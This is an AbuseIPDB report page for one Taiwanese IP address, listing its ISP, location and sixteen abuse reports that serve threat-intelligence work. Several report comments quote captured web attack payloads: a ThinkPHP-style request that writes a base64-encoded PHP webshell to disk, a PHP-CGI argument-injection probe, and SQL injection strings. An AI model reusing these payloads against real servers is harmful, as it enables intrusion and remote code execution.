JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 111.243.127.144

111.243.127.144 was found in our database!

This IP was reported 16 times. Confidence of Abuse is 0%: ?

ISP	Chunghwa Telecom Data Communication Business Group
Usage Type	Fixed Line ISP
ASN	AS3462
Hostname(s)	111-243-127-144.dynamic-ip.hinet.net
Domain Name	cht.com.tw
Country	🇹🇼 Taiwan
City	Taipei, Taiwan

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 111.243.127.144

Whois 111.243.127.144

IP Abuse Reports for 111.243.127.144:

This IP address has been reported a total of 16 times from 13 distinct sources. 111.243.127.144 was first reported on May 22nd 2024, and the most recent report was 3 weeks ago.

Old Reports: The most recent abuse report for this IP address is from 3 weeks ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇯🇵 VXG-NET	2026-05-16 12:48:09 (3 weeks ago)	port=28293, indicator_type=N/A	Port Scan Hacking
🇨🇭 backslash	2025-03-16 06:52:45 (1 year ago)		Bad Web Bot
🇳🇱 exxos	2025-02-21 17:26:44 (1 year ago)	Attacks with Bad user agents	Hacking
🇮🇩 penjaga BRIN	2025-02-20 16:20:20 (1 year ago)	Possible HTTP Malicious Payload Detection(59186)	Web App Attack
🇮🇩 penjaga BRIN	2025-02-20 00:22:23 (1 year ago)	ECShop Remote Code Execution Vulnerability(54648)	Web App Attack
🇨🇦 polycoda	2025-02-19 19:54:45 (1 year ago)	💉 URL GET parameter and/or SQL injection attempts trying to pass quotes, backslashes, %20AND%201=1%2 ... show more 💉 URL GET parameter and/or SQL injection attempts trying to pass quotes, backslashes, %20AND%201=1%20OR%20, etc... show less	Hacking SQL Injection Web App Attack
🇫🇮 oh.mg	2025-02-19 19:09:04 (1 year ago)	[Wed Feb 19 20:08:58.016208 2025] [security2:error] [pid 4080603:tid 4080610] [client 111.243.127.14 ... show more [Wed Feb 19 20:08:58.016208 2025] [security2:error] [pid 4080603:tid 4080610] [client 111.243.127.144:46681] [client 111.243.127.144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:blocking_inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "233"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [ver "OWASP_CRS/4.10.0-dev"] [tag "anomaly-evaluation"] [tag "OWASP_CRS"] [hostname "oh.mg"] [uri "/index.php"] [unique_id "Z7YsSo95RwT6favdX2KINAAAAAU"], referer: https://oh.mg/index.php?s=captcha [Wed Feb 19 20:09:03.290969 2025] [security2:error] [pid 4080603:tid 4080626] [client 111.243.127.144:46681] [client 111.243.127.144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:blocking_inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "233"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Tot ... show less	Bad Web Bot Web App Attack
🇳🇱 exxos	2025-02-19 19:08:07 (1 year ago)	Attacks with Bad user agents	Hacking
🇮🇩 Burayot	2025-02-19 17:36:19 (1 year ago)	LF_MODSEC: (mod_security) mod_security (id:949110) triggered by 111.243.127.144 (TW/Taiwan/111-243-1 ... show more LF_MODSEC: (mod_security) mod_security (id:949110) triggered by 111.243.127.144 (TW/Taiwan/111-243-127-144.dynamic-ip.hinet.net): 2 in the last 3600 secs show less	Web App Attack
🇮🇹 secureme	2025-02-19 12:41:00 (1 year ago)	<?php echo md5("cmd"); ?>	Web App Attack
🇺🇸 mnsf	2025-02-19 11:05:19 (1 year ago)	Too many Status 40X (11)	Brute-Force Web App Attack
🇺🇸 AbuseIPDB AbuseIPDB Official	2025-02-19 10:45:18 (1 year ago)	Suspicious Operation. Request content: s=file_put_contents('blgx.php',base64_decode('PD9waHAgIGVjaG8 ... show more Suspicious Operation. Request content: s=file_put_contents('blgx.php',base64_decode('PD9waHAgIGVjaG8obWQ1KCdjJykpO0BldmFsKCRfUE9TVFsneiddKTs7Pz4zOTQzM2NjNTdjMTNiMA=='))&_method=__construct&method=POST&filter[]=assert show less	Web App Attack
🇺🇸 AbuseIPDB AbuseIPDB Official	2025-02-19 10:45:17 (1 year ago)	Suspicious Operation. Request content: _method=__construct&method=GET&filter[]=system&get[]=echo PD9 ... show more Suspicious Operation. Request content: _method=__construct&method=GET&filter[]=system&get[]=echo PD9waHAgIGVjaG8obWQ1KCdjJykpO0BldmFsKCRfUE9TVFsneiddKTs7Pz4= \| base64 -d >>tjxnh.php show less	Web App Attack
🇳🇿 Tripwire	2025-02-19 10:07:30 (1 year ago)	Scanning for exploits - /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp ... show more Scanning for exploits - /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input show less	Web App Attack
🇸🇪 webbfabriken	2024-05-23 03:40:51 (2 years ago)	spam or other hacking activities reported by webbfabriken security servers Attack reported by Webbf ... show more spam or other hacking activities reported by webbfabriken security servers Attack reported by Webbfabiken Security API - WFSecAPI show less	Web Spam

Showing 1 to 15 of 16 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇮🇳 152.32.159.79

🇩🇪 45.135.141.21

🇸🇳 41.82.50.218

🇮🇳 20.193.141.133

🇷🇴 2.57.121.112

🇩🇪 213.209.159.56

🇨🇦 199.21.149.124

🇸🇬 152.42.164.200

🇨🇳 106.13.30.117

🇩🇪 213.209.159.215

🇲🇽 187.136.39.253

🇧🇷 148.227.123.39

🇩🇪 139.19.117.131

🇫🇷 78.197.144.150

🇺🇸 3.14.10.133

🇺🇸 132.196.25.14

🇹🇿 102.64.69.13

🇬🇧 81.19.219.201

🇮🇳 61.12.86.155

🇷🇴 2.57.121.25